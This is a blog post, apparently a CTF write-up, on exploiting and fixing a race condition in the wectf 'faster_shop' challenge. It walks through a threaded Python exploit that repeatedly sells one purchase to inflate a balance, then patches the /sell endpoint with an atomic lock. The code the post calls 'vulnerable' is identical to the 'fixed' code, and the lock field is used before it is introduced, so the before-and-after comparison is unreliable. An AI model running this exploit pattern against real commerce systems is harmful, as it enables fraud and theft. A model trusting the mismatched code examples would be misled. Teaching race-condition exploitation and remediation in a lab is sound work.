Exploiting and Fixing a Race Condition Problem

Published in

Sinch Blog

8 min read · Jun 22, 2020

Recently I participated in the wectf and had the chance to face some really cool security challenges. In one of them, called faster_shop, we needed to exploit a race condition to solve the challenge. Cool, right?

The Happy Path

Before talking about race conditions and how to fix them, let's explore the happy path of the problem a bit. Thankfully the author of this challenge provided a Dockerfile [1] for those who want to reproduce it later.

git clone https://github.com/shouc/wectf-2020.git
cd wectf-2020/faster_shop
docker build . -t local/faster_shop
docker run -it --rm -p 1002:1002 local/faster_shop

Now if you open http://localhost:1002 in your browser, you will see the login page.

Just enter any login and password and the application will accept them. Once you are logged in, you will see the “buying page”, where we want to buy that Fancy Flag. Sadly we only have 20 bucks, and the flag costs 21.

The only other possibility is to buy and sell Galois Milk or Alpaca Salad, but with these options our balance will never go above 20 bucks. We must exploit some vulnerability in this system to go above 20 bucks and buy the Fancy Flag.

Race Conditions

A race condition is a category of vulnerability where two agents compete for some resource and, because the timing is just right, the outcome differs from the expected one. One of the most famous race condition exploits is Dirty Cow [6], where a race condition lets an attacker edit a file that wasn’t supposed to be edited, giving the attacker root.

I’ll use an example that will help us later with the challenge. Imagine a bank with two employees who process withdrawals from accounts, and both follow the same algorithm: read the account balance, then update it.

Since there is a gap between the time when someone reads your balance and the time someone updates it, we can trigger a race condition by asking two employees to withdraw some money at the same time. The timeline would be like this:

And this works because there is a time gap between reading some information, and updating it.
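The bank scenario can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the `Account` class, the `withdraw` function, and the amounts are hypothetical, and a `threading.Barrier` is used to force both "employees" into the gap between reading and writing so the outcome is reproducible.

```python
import threading

class Account:
    """Hypothetical in-memory bank account."""
    def __init__(self, balance):
        self.balance = balance

def withdraw(account, amount, gap, results):
    current = account.balance           # step 1: read the balance
    if current < amount:                # step 2: check it covers the amount
        results.append(False)
        return
    gap()                               # the time gap between read and update
    account.balance = current - amount  # step 3: write back a stale value
    results.append(True)

def run_two_withdrawals(start, amount):
    account = Account(start)
    barrier = threading.Barrier(2)      # both threads meet inside the gap
    results = []
    threads = [
        threading.Thread(target=withdraw,
                         args=(account, amount, barrier.wait, results))
        for _ in range(2)
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return account.balance, results
```

Calling `run_two_withdrawals(100, 60)` lets both withdrawals succeed: 120 leaves an account that only held 100, and the stored balance ends at 40 because each employee computed it from the same stale read.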

Exploiting The System

Since this is an article about race conditions, and since I’ve spent an entire section explaining how they work, let’s put that into action in this challenge. The first thing to do is to set a strategy: in this case we will try to buy a product and then sell it two times. If we succeed, our balance will go above 20 bucks, and we will finally be able to buy that Fancy Flag.

Now that we have a strategy, we need to understand how to programmatically buy and sell products. There is no need for fancy tools here. Just use your browser developer tools and take a look at the requests ([2] and [3] are good resources). You’ll see that the requests to buy and sell are:

# :TOKEN, your token assigned on login

# To buy
# PRODUCT_ID, 1 -> Milk, 2 -> Soup, 3 -> Flag
POST /buy/:PRODUCT_ID HTTP/1.0
Cookie: token=:TOKEN

# To sell
POST /sell/:TRANSACTION_ID HTTP/1.0
Cookie: token=:TOKEN

Knowing the requests necessary to buy and sell products in the system, we can use a scripting language like Python 3 to build an exploit. In this case we will use the requests [4] library to make everything as easy as possible. If you replicate the requests in Python you will get something like this:

#!/bin/python3
from requests import post

def buy(token, id):
  cookies = {"token": token}
  return post("http://localhost:1002/buy/" + id, cookies=cookies)

def sell(token, id):
  cookies = {"token": token}
  return post("http://localhost:1002/sell/" + id, cookies=cookies)

Now we need a way to buy one time and sell multiple times. While playing wectf I just spawned multiple instances of selling scripts and manually bought some milk, but since we have time now I’ll use threads [5] to make this nice and clean. There will be one thread buying milk and N threads selling milk. Code to do so will look like this:

import threading
import time

# `token` is the session token assigned on login

class Buyer(threading.Thread):
  def run(self):
    while True:
      print("Buying milk...")
      buy(token, "1")
      time.sleep(2)

class Seller(threading.Thread):
  def run(self):
    while True:
      # Some code that finds the id
      id = "1"
      sell(token, id)
Now we just need to make a function to find the first transaction id and spawn the threads. The resulting code will be close to this:

#!/bin/python3

# Global Variables - Byte me
token = "117af0c5-cf67-4057-b982-bcba4d7ef2b4"
N = 20

# Communication with the app
from requests import post, get

def buy(token, id):
  cookies = {"token": token}
  return post("http://localhost:1002/buy/"+id, cookies=cookies)

def sell(token, id):
  cookies = {"token": token}
  return post("http://localhost:1002/sell/"+id, cookies=cookies)

def find_id(token):
  cookies = {"token": token}
  body = get("http://localhost:1002", cookies=cookies).text
  return body.split("<form action=\"/sell/")[1].split("\" method=\"post\">")[0]

# Threads Classes
import threading
import time

class Buyer(threading.Thread):
  def run(self):
    while True:
      print("Buying milk...")
      buy(token, "1")
      time.sleep(2)

class Seller(threading.Thread):
  def run(self):
    while True:
      # Some code that find the id
      try:
        id = find_id(token)
        print("Selling Milk..")
        sell(token, id)
      except:
        pass

if __name__ == "__main__":
  b = Buyer()
  b.start()
  sellers = []
  for _ in range(N):
    sellers.append(Seller())
    sellers[-1].start()

After running the script above for some seconds and reloading the page, you will encounter something like this:

Now we can sell the extra milk and buy that Fancy Flag that we couldn't before.

Fixing the System

We are going to fix the /sell endpoint, since it is the one we exploited in this article. The /buy endpoint is also vulnerable to race conditions, and fixing it is a great exercise to practice what we are covering here. This is the vulnerable code:

@staticmethod
@db.connection_context()
def sell(token: str, purchase_id: int) -> (bool, str):
  user_objs = User \
    .select() \
    .where(User.token == token)

  if len(user_objs) == 0:
    return False, "Wrong Token"

  user_obj = user_objs[0]
  # stored as a string so it compares equal to the CharField value read back
  lock_val = str(uuid.uuid1())

  got_lock = PurchaseLog \
    .update(lock=lock_val) \
    .where(PurchaseLog.id == purchase_id) \
    .where(PurchaseLog.user_id == user_obj.id) \
    .where(PurchaseLog.lock == "") \
    .execute()

  if got_lock != 1:
    return False, "Item not found, or lock not acquired"

  purchases = PurchaseLog \
    .select() \
    .where(PurchaseLog.id == purchase_id)

  purchase = purchases[0]

  # sanity check
  if lock_val != purchase.lock:
    return False, "Lock sanity check failed"

  PurchaseLog \
    .delete() \
    .where(PurchaseLog.id == purchase_id) \
    .execute()

  User \
    .update(balance=user_obj.balance + purchase.paid_amount) \
    .where(User.id == user_obj.id) \
    .execute()

  if purchase.paid_amount == 21:
    return False, f"Well, flag is {os.getenv('FLAG')}"

  return True, ""

Putting it into simplified terms, this code is doing the following:

Check if the purchased item exists
Check if you are logged in
Check if you own the purchased item
Delete the purchased item
Update your balance

This is the perfect scenario for a race condition. Let’s first reduce the attack surface a little (in this case the attack surface is the time between transactions). The first thing to do is to move the login verification to the top of the list and merge the two checks for existence and ownership of the purchase. So the new order is:

Check if you are logged in
Check if the purchase exists and if you are the owner of it
Delete the item
Update your balance

This alone reduces the attack surface a lot, but does not eliminate the vulnerability. Since there is a gap between checking if the item belongs to the user, removing the item, and changing the balance, there is still room for a race condition.
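To see why the remaining gap still matters, here is a small simulation of the check, delete, and credit sequence. It is a sketch under assumptions, not the application's code: the in-memory `db` dictionary, the `sell_unsafe` function, and the milk price of 5 are all hypothetical, and a `threading.Barrier` forces both sell requests into the gap after the ownership check.

```python
import threading

def sell_unsafe(db, user, purchase_id, gap):
    # Check that the purchase exists and belongs to the user.
    purchase = db["purchases"].get(purchase_id)
    if purchase is None or purchase["user"] != user:
        return False
    gap()  # time gap between the check and the delete
    # Delete the item (a second delete of the same id is silently ignored).
    db["purchases"].pop(purchase_id, None)
    # Credit the user; the mutex only protects the increment itself.
    with db["mutex"]:
        db["balance"][user] += purchase["paid"]
    return True

def race_two_sells():
    db = {
        "purchases": {1: {"user": "me", "paid": 5}},  # one milk, assumed price 5
        "balance": {"me": 15},                        # 20 minus the assumed price
        "mutex": threading.Lock(),
    }
    barrier = threading.Barrier(2)  # both requests pass the check first
    threads = [
        threading.Thread(target=sell_unsafe, args=(db, "me", 1, barrier.wait))
        for _ in range(2)
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return db["balance"]["me"]
```

In this sketch `race_two_sells()` returns 25: a single purchase is credited twice because both requests passed the check before either one deleted the item.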

We will solve it by adding a lock to the schema of the transactions table, so that when we try to sell an item registered in a transaction, the code checks the lock first. In the code that defines a transaction (line 22 of app.py), insert a field called lock:

class PurchaseLog(Model):
  id = AutoField()
  user_id = IntegerField()
  product_id = IntegerField()
  paid_amount = IntegerField()
  v_date = DateField(default=datetime.datetime.now)
  lock = CharField()

  class Meta:
    database = db

and on line 125 of app.py, initialize it to an empty string when a purchase is created:

try:
  PurchaseLog.create(
    user_id=user_obj.id,
    product_id=product_obj.id,
    paid_amount=product_obj.price,
    lock = ""
  )

Now that we have our lock implemented, the order of activities should be like:

Check if you are logged in
Check if the row is locked
Lock the row
Check if the purchase exists and if you are the owner of it
Delete the item
Update your balance

Although we reduced the time frame to a minimum, there is still a gap between reading the lock and acquiring it. In scenarios like this, where you need to check a lock and then acquire it, the two steps must happen as one atomic operation to guarantee that there is no race condition between them.

We can reach this atomicity with an update that only matches where lock == "", so checking the lock and taking it happen in a single statement, and voilà, the race condition is no more. This is the resulting code:

@staticmethod
@db.connection_context()
def sell(token: str, purchase_id: int) -> (bool, str):
  user_objs = User \
    .select() \
    .where(User.token == token)

  if len(user_objs) == 0:
    return False, "Wrong Token"

  user_obj = user_objs[0]
  # stored as a string so it compares equal to the CharField value read back
  lock_val = str(uuid.uuid1())

  # got_lock is the number of rows updated
  got_lock = PurchaseLog \
    .update(lock=lock_val) \
    .where(PurchaseLog.id == purchase_id) \
    .where(PurchaseLog.user_id == user_obj.id) \
    .where(PurchaseLog.lock == "") \
    .execute()

  if got_lock != 1:
    return False, "Item not found, or lock not acquired"

  purchases = PurchaseLog \
    .select() \
    .where(PurchaseLog.id == purchase_id)

  purchase = purchases[0]

  # sanity check
  if lock_val != purchase.lock:
    return False, "Lock sanity check failed"

  PurchaseLog \
    .delete() \
    .where(PurchaseLog.id == purchase_id) \
    .execute()

  User \
    .update(balance=user_obj.balance + purchase.paid_amount) \
    .where(User.id == user_obj.id) \
    .execute()

  if purchase.paid_amount == 21:
    return False, f"Well, flag is {os.getenv('FLAG')}"

  return True, ""
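The same conditional-update idea can be tried outside the application with Python's built-in sqlite3 module. This is a minimal sketch under assumptions, not the challenge's code: the table layout, the `make_db`, `sell`, and `balance` helpers, the user id 7, and the price of 5 are all hypothetical. The point it illustrates is that the lock is checked and taken by one UPDATE statement, and the number of affected rows tells us whether we won.

```python
import sqlite3
import uuid

def make_db():
    # Hypothetical schema: one user with 15 bucks who owns one purchase worth 5.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user (id INTEGER PRIMARY KEY, balance INTEGER NOT NULL);
        CREATE TABLE purchase (
            id INTEGER PRIMARY KEY,
            user_id INTEGER NOT NULL,
            paid_amount INTEGER NOT NULL,
            lock TEXT NOT NULL DEFAULT ''
        );
        INSERT INTO user (id, balance) VALUES (7, 15);
        INSERT INTO purchase (id, user_id, paid_amount) VALUES (1, 7, 5);
    """)
    return conn

def sell(conn, user_id, purchase_id):
    lock_val = str(uuid.uuid4())
    # Check and lock in ONE statement: only an unlocked row owned by the user matches.
    cur = conn.execute(
        "UPDATE purchase SET lock = ? WHERE id = ? AND user_id = ? AND lock = ''",
        (lock_val, purchase_id, user_id),
    )
    if cur.rowcount != 1:
        conn.rollback()
        return False  # item not found, not ours, or already locked
    (paid,) = conn.execute(
        "SELECT paid_amount FROM purchase WHERE id = ?", (purchase_id,)
    ).fetchone()
    conn.execute("DELETE FROM purchase WHERE id = ?", (purchase_id,))
    # Increment inside the database instead of writing back a value read earlier.
    conn.execute(
        "UPDATE user SET balance = balance + ? WHERE id = ?", (paid, user_id)
    )
    conn.commit()
    return True

def balance(conn, user_id):
    row = conn.execute("SELECT balance FROM user WHERE id = ?", (user_id,)).fetchone()
    return row[0]
```

With this sketch, the first `sell(conn, 7, 1)` succeeds and any repeat attempt is rejected, so the item is credited once. The `balance = balance + ?` form is a design choice added here, on the assumption that letting the database do the increment avoids reusing a stale balance.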

I left the same exploit we used last time running all night and it did not work at all =D

Applicability

Many people are skeptical about security challenges, saying that they have little to no applicability in real-life scenarios. That is not the case here: race conditions are a real threat for every multi-threaded program or distributed system. Here are some reports of race condition related problems:

$15,200.00 — Shopify — https://hackerone.com/reports/300305

$10,000.00 — Flash — https://hackerone.com/reports/37240

$2,100.00 — HackerOne — https://hackerone.com/reports/429026

$150.00 — Slack — https://hackerone.com/reports/165570

Another huge market for this kind of flaw is Massively Multiplayer Online (MMO) games. Since they usually handle a lot of asynchronous requests and do a ton of parallel processing, race conditions can happen easily. I will leave a video down here of a DEF CON talk that covers this topic and some others.